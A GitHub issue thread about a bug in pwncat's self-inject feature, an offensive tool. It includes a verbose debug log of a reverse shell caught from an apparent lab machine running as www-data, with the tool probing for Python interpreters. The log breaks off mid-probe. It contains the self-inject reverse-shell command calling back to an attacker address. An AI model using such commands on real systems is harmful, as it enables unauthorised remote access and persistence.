-
-
Notifications
You must be signed in to change notification settings - Fork 212
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Self-inject command does not find python version #83
Comments
|
|
The remote end somehow sends this first:
Probably a response to It's also receiving something like this prior/during probing:
Did u issue any other commands related to this received output? |
i did not use that cmd no. all i sent was unsure why the remote would be somehow sending that back first? all i have tried is the self inject function. I also tried deploying it manually but it crashes the shell when i paste the base 64 in every time i have tried that haha |
Am i right in saying it should be sending an -if not just -f ? |
Also not sure what exactly is going on. Will prepare something which is checking if data is to be received before probing. |
@dalemazza can you try out branch |
kali@kali:/opt/pwncat/pwncat$ pwncat -l 1234 --self-inject /bin/bash:10.9.33.138:1234 -vvvv
2020-06-12 17:05:18,065 DEBUG [MainThread] 1447:create_socket(): Creating (family 10/IPv6, TCP) socket
2020-06-12 17:05:18,065 DEBUG [MainThread] 1467:create_socket(): Disabling IPv4 support on IPv6 socket
2020-06-12 17:05:18,065 DEBUG [MainThread] 1447:create_socket(): Creating (family 2/IPv4, TCP) socket
2020-06-12 17:05:18,065 DEBUG [MainThread] 1385:gethostbyname(): Resolving IPv6 name not required, using wildcard: ::
2020-06-12 17:05:18,065 DEBUG [MainThread] 1382:gethostbyname(): Resolving IPv4 name not required, using wildcard: 0.0.0.0
2020-06-12 17:05:18,065 DEBUG [MainThread] 1498:bind(): Binding (family 10/IPv6, TCP) socket to :::1234
2020-06-12 17:05:18,065 DEBUG [MainThread] 1498:bind(): Binding (family 2/IPv4, TCP) socket to 0.0.0.0:1234
2020-06-12 17:05:18,065 DEBUG [MainThread] 1526:listen(): Listening with backlog=0
2020-06-12 17:05:18,065 INFO [MainThread] 2151:run_server(): Listening on :::1234 (family 10/IPv6, TCP)
2020-06-12 17:05:18,065 DEBUG [MainThread] 1526:listen(): Listening with backlog=0
2020-06-12 17:05:18,065 INFO [MainThread] 2151:run_server(): Listening on 0.0.0.0:1234 (family 2/IPv4, TCP)
2020-06-12 17:05:18,065 DEBUG [MainThread] 1549:accept(): Waiting for TCP client
2020-06-12 17:05:28,451 INFO [MainThread] 1561:accept(): Client connected from 10.10.182.191:45802 (family 2/IPv4, TCP)
[PWNCAT CnC] Probing for: /bin/python
2020-06-12 17:05:28,452 DEBUG [MainThread] 1803:send(): Trying to send 49 bytes to 10.10.182.191:45802
2020-06-12 17:05:28,452 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /bin/python && echo /bin/python || echo;\n'
2020-06-12 17:05:28,452 DEBUG [MainThread] 1826:send(): Sent 49 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:28,454 DEBUG [MainThread] 1938:receive(): Received 115 bytes from 10.10.182.191:45802
2020-06-12 17:05:28,454 TRACE [MainThread] 1944:receive(): Received: 'Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux\n'
[PWNCAT CnC] Probing for: /bin/python2
2020-06-12 17:05:28,454 DEBUG [MainThread] 1803:send(): Trying to send 51 bytes to 10.10.182.191:45802
2020-06-12 17:05:28,454 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /bin/python2 && echo /bin/python2 || echo;\n'
2020-06-12 17:05:28,454 DEBUG [MainThread] 1826:send(): Sent 51 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:28,482 DEBUG [MainThread] 1938:receive(): Received 243 bytes from 10.10.182.191:45802
2020-06-12 17:05:28,482 TRACE [MainThread] 1944:receive(): Received: " 17:05:28 up 13 min, 0 users, load average: 0.00, 0.15, 0.24\nUSER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n/bin/sh: 0: can't access tty; job control turned off\n$ \n$ "
[PWNCAT CnC] Probing for: /bin/python2.7
2020-06-12 17:05:28,483 DEBUG [MainThread] 1803:send(): Trying to send 55 bytes to 10.10.182.191:45802
2020-06-12 17:05:28,483 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /bin/python2.7 && echo /bin/python2.7 || echo;\n'
2020-06-12 17:05:28,483 DEBUG [MainThread] 1826:send(): Sent 55 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:28,506 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:28,506 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /bin/python3
2020-06-12 17:05:28,506 DEBUG [MainThread] 1803:send(): Trying to send 51 bytes to 10.10.182.191:45802
2020-06-12 17:05:28,506 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /bin/python3 && echo /bin/python3 || echo;\n'
2020-06-12 17:05:28,506 DEBUG [MainThread] 1826:send(): Sent 51 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:28,530 DEBUG [MainThread] 1938:receive(): Received 1 bytes from 10.10.182.191:45802
2020-06-12 17:05:28,530 TRACE [MainThread] 1944:receive(): Received: '\n'
[PWNCAT CnC] Probing for: /bin/python3.5
2020-06-12 17:05:28,530 DEBUG [MainThread] 1803:send(): Trying to send 55 bytes to 10.10.182.191:45802
2020-06-12 17:05:28,530 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /bin/python3.5 && echo /bin/python3.5 || echo;\n'
2020-06-12 17:05:28,530 DEBUG [MainThread] 1826:send(): Sent 55 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:28,720 DEBUG [MainThread] 1938:receive(): Received 2 bytes from 10.10.182.191:45802
2020-06-12 17:05:28,720 TRACE [MainThread] 1944:receive(): Received: '$ '
[PWNCAT CnC] Probing for: /bin/python3.6
2020-06-12 17:05:28,720 DEBUG [MainThread] 1803:send(): Trying to send 55 bytes to 10.10.182.191:45802
2020-06-12 17:05:28,720 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /bin/python3.6 && echo /bin/python3.6 || echo;\n'
2020-06-12 17:05:28,720 DEBUG [MainThread] 1826:send(): Sent 55 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:28,744 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:28,744 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /bin/python3.7
2020-06-12 17:05:28,744 DEBUG [MainThread] 1803:send(): Trying to send 55 bytes to 10.10.182.191:45802
2020-06-12 17:05:28,744 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /bin/python3.7 && echo /bin/python3.7 || echo;\n'
2020-06-12 17:05:28,744 DEBUG [MainThread] 1826:send(): Sent 55 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:28,811 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:28,811 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /bin/python3.8
2020-06-12 17:05:28,811 DEBUG [MainThread] 1803:send(): Trying to send 55 bytes to 10.10.182.191:45802
2020-06-12 17:05:28,811 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /bin/python3.8 && echo /bin/python3.8 || echo;\n'
2020-06-12 17:05:28,811 DEBUG [MainThread] 1826:send(): Sent 55 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:28,945 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:28,945 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/bin/python
2020-06-12 17:05:28,945 DEBUG [MainThread] 1803:send(): Trying to send 57 bytes to 10.10.182.191:45802
2020-06-12 17:05:28,945 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/bin/python && echo /usr/bin/python || echo;\n'
2020-06-12 17:05:28,945 DEBUG [MainThread] 1826:send(): Sent 57 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,016 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,016 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/bin/python2
2020-06-12 17:05:29,016 DEBUG [MainThread] 1803:send(): Trying to send 59 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,016 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/bin/python2 && echo /usr/bin/python2 || echo;\n'
2020-06-12 17:05:29,016 DEBUG [MainThread] 1826:send(): Sent 59 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,042 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,042 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/bin/python2.7
2020-06-12 17:05:29,042 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,042 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/bin/python2.7 && echo /usr/bin/python2.7 || echo;\n'
2020-06-12 17:05:29,042 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,067 DEBUG [MainThread] 1938:receive(): Received 18 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,067 TRACE [MainThread] 1944:receive(): Received: '/usr/bin/python\n$ '
[PWNCAT CnC] Probing for: /usr/bin/python3
2020-06-12 17:05:29,067 DEBUG [MainThread] 1803:send(): Trying to send 59 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,067 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/bin/python3 && echo /usr/bin/python3 || echo;\n'
2020-06-12 17:05:29,067 DEBUG [MainThread] 1826:send(): Sent 59 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,092 DEBUG [MainThread] 1938:receive(): Received 19 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,092 TRACE [MainThread] 1944:receive(): Received: '/usr/bin/python2\n$ '
[PWNCAT CnC] Probing for: /usr/bin/python3.5
2020-06-12 17:05:29,092 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,092 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/bin/python3.5 && echo /usr/bin/python3.5 || echo;\n'
2020-06-12 17:05:29,092 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,118 DEBUG [MainThread] 1938:receive(): Received 21 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,118 TRACE [MainThread] 1944:receive(): Received: '/usr/bin/python2.7\n$ '
[PWNCAT CnC] Probing for: /usr/bin/python3.6
2020-06-12 17:05:29,118 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,118 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/bin/python3.6 && echo /usr/bin/python3.6 || echo;\n'
2020-06-12 17:05:29,118 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,143 DEBUG [MainThread] 1938:receive(): Received 19 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,144 TRACE [MainThread] 1944:receive(): Received: '/usr/bin/python3\n$ '
[PWNCAT CnC] Probing for: /usr/bin/python3.7
2020-06-12 17:05:29,144 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,144 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/bin/python3.7 && echo /usr/bin/python3.7 || echo;\n'
2020-06-12 17:05:29,144 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,334 DEBUG [MainThread] 1938:receive(): Received 21 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,334 TRACE [MainThread] 1944:receive(): Received: '/usr/bin/python3.5\n$ '
[PWNCAT CnC] Probing for: /usr/bin/python3.8
2020-06-12 17:05:29,335 DEBUG [MainThread] 1803:send(): Trying to send 63 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,335 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/bin/python3.8 && echo /usr/bin/python3.8 || echo;\n'
2020-06-12 17:05:29,335 DEBUG [MainThread] 1826:send(): Sent 63 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,359 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,359 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/bin/python
2020-06-12 17:05:29,359 DEBUG [MainThread] 1803:send(): Trying to send 69 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,359 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/bin/python && echo /usr/local/bin/python || echo;\n'
2020-06-12 17:05:29,359 DEBUG [MainThread] 1826:send(): Sent 69 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,425 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,425 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/bin/python2
2020-06-12 17:05:29,425 DEBUG [MainThread] 1803:send(): Trying to send 71 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,425 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/bin/python2 && echo /usr/local/bin/python2 || echo;\n'
2020-06-12 17:05:29,425 DEBUG [MainThread] 1826:send(): Sent 71 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,630 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,630 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/bin/python2.7
2020-06-12 17:05:29,630 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,631 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/bin/python2.7 && echo /usr/local/bin/python2.7 || echo;\n'
2020-06-12 17:05:29,631 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,655 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,655 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/bin/python3
2020-06-12 17:05:29,655 DEBUG [MainThread] 1803:send(): Trying to send 71 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,655 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/bin/python3 && echo /usr/local/bin/python3 || echo;\n'
2020-06-12 17:05:29,655 DEBUG [MainThread] 1826:send(): Sent 71 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,681 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,681 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/bin/python3.5
2020-06-12 17:05:29,681 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,681 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/bin/python3.5 && echo /usr/local/bin/python3.5 || echo;\n'
2020-06-12 17:05:29,681 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,706 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,706 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/bin/python3.6
2020-06-12 17:05:29,707 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,707 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/bin/python3.6 && echo /usr/local/bin/python3.6 || echo;\n'
2020-06-12 17:05:29,707 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,735 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,735 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/bin/python3.7
2020-06-12 17:05:29,735 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,735 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/bin/python3.7 && echo /usr/local/bin/python3.7 || echo;\n'
2020-06-12 17:05:29,735 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,760 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,760 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/bin/python3.8
2020-06-12 17:05:29,761 DEBUG [MainThread] 1803:send(): Trying to send 75 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,761 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/bin/python3.8 && echo /usr/local/bin/python3.8 || echo;\n'
2020-06-12 17:05:29,761 DEBUG [MainThread] 1826:send(): Sent 75 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,949 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,949 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python/bin/python
2020-06-12 17:05:29,949 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,949 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python/bin/python && echo /usr/local/python/bin/python || echo;\n'
2020-06-12 17:05:29,949 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:29,977 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:29,977 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python/bin/python2
2020-06-12 17:05:29,977 DEBUG [MainThread] 1803:send(): Trying to send 85 bytes to 10.10.182.191:45802
2020-06-12 17:05:29,977 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python/bin/python2 && echo /usr/local/python/bin/python2 || echo;\n'
2020-06-12 17:05:29,977 DEBUG [MainThread] 1826:send(): Sent 85 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,040 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,041 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python/bin/python2.7
2020-06-12 17:05:30,041 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,042 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python/bin/python2.7 && echo /usr/local/python/bin/python2.7 || echo;\n'
2020-06-12 17:05:30,042 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,174 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,174 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python/bin/python3
2020-06-12 17:05:30,174 DEBUG [MainThread] 1803:send(): Trying to send 85 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,174 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python/bin/python3 && echo /usr/local/python/bin/python3 || echo;\n'
2020-06-12 17:05:30,174 DEBUG [MainThread] 1826:send(): Sent 85 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,244 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,245 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python/bin/python3.5
2020-06-12 17:05:30,245 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,245 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python/bin/python3.5 && echo /usr/local/python/bin/python3.5 || echo;\n'
2020-06-12 17:05:30,245 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,268 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,268 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python/bin/python3.6
2020-06-12 17:05:30,268 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,268 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python/bin/python3.6 && echo /usr/local/python/bin/python3.6 || echo;\n'
2020-06-12 17:05:30,269 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,295 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,295 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python/bin/python3.7
2020-06-12 17:05:30,295 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,295 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python/bin/python3.7 && echo /usr/local/python/bin/python3.7 || echo;\n'
2020-06-12 17:05:30,295 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,328 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,328 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python/bin/python3.8
2020-06-12 17:05:30,328 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,328 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python/bin/python3.8 && echo /usr/local/python/bin/python3.8 || echo;\n'
2020-06-12 17:05:30,328 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,352 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,352 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python
2020-06-12 17:05:30,352 DEBUG [MainThread] 1803:send(): Trying to send 85 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,352 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2/bin/python && echo /usr/local/python2/bin/python || echo;\n'
2020-06-12 17:05:30,352 DEBUG [MainThread] 1826:send(): Sent 85 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,376 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,376 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python2
2020-06-12 17:05:30,376 DEBUG [MainThread] 1803:send(): Trying to send 87 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,376 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2/bin/python2 && echo /usr/local/python2/bin/python2 || echo;\n'
2020-06-12 17:05:30,376 DEBUG [MainThread] 1826:send(): Sent 87 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,564 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,564 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python2.7
2020-06-12 17:05:30,565 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,565 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2/bin/python2.7 && echo /usr/local/python2/bin/python2.7 || echo;\n'
2020-06-12 17:05:30,565 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,588 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,589 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python3
2020-06-12 17:05:30,589 DEBUG [MainThread] 1803:send(): Trying to send 87 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,589 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2/bin/python3 && echo /usr/local/python2/bin/python3 || echo;\n'
2020-06-12 17:05:30,589 DEBUG [MainThread] 1826:send(): Sent 87 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,654 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,654 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python3.5
2020-06-12 17:05:30,654 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,654 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2/bin/python3.5 && echo /usr/local/python2/bin/python3.5 || echo;\n'
2020-06-12 17:05:30,654 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,789 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,789 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python3.6
2020-06-12 17:05:30,789 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,789 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2/bin/python3.6 && echo /usr/local/python2/bin/python3.6 || echo;\n'
2020-06-12 17:05:30,789 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,862 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,862 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python3.7
2020-06-12 17:05:30,863 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,863 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2/bin/python3.7 && echo /usr/local/python2/bin/python3.7 || echo;\n'
2020-06-12 17:05:30,863 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,887 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,887 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python3.8
2020-06-12 17:05:30,887 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,887 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2/bin/python3.8 && echo /usr/local/python2/bin/python3.8 || echo;\n'
2020-06-12 17:05:30,887 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,911 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,911 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python
2020-06-12 17:05:30,911 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.182.191:45802
2020-06-12 17:05:30,911 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2.7/bin/python && echo /usr/local/python2.7/bin/python || echo;\n'
2020-06-12 17:05:30,911 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:30,934 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:30,934 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python2
2020-06-12 17:05:30,935 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.182.191:45802
